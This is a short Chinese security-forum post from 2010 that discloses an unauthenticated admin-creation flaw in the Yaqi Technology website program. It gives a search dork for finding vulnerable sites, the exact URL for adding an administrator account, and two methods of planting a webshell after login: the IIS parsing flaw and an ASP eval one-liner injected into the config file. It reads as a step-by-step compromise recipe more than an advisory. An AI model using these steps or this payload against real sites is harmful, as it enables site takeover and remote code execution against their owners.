标题:
雅琦科技程序 任意添加管理员0day
[打印本页]
作者:
hyrz
时间:
2010-6-22 14:54
标题:
雅琦科技程序 任意添加管理员0day
发布日期:2010-06.19
发布作者:Sniff3r & lan3a
影响版本:未知
漏洞描述: 网站后台缺少验证可远程添加管理员用户并登录后台。
这个程序是Sniff3r提出拿一个站的时候发现的。
关键字:inurl:ShowInfo.asp?ShowId=
找到网站后然后在网站地址后加上:admin/User_Manage.asp?action=UserAdd
进去添加一个管理员,然后用添加的账户登录。
/admin/Yqlogin.asp
/admin/admin_main.asp
后台拿Webshell有2个方法。
1.在上传目录那里 添加1.asp,利用IIS的解析漏洞。
2.在上传目录那里 写上
"%><%eval request("a")%><%'
然后访问配置文件 inc/config.asp
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2